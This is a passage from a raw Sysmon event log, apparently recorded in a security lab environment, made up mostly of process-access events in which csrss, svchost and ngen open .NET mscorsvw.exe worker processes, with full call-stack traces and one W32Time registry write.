dll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.046{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0102-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.046{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0102-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.968{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9136-6005-0D02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.968{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9136-6005-0D02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.968{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9136-6005-0D02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.874{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9136-6005-0C02-00000000A301}2964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.874{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9136-6005-0C02-00000000A301}2964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:30.874{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9136-6005-0C02-00000000A301}2964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:46:30.656{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x5390dfb0) 10341000x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.969{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1B02-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.969{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1B02-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.969{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1B02-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.922{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1A02-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.906{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1A02-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.906{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1A02-00000000A301}3800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1902-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.875{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1902-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.875{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1902-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.828{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1802-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.812{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1802-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.812{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1802-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-1702-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.765{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-1702-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-1702-00000000A301}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\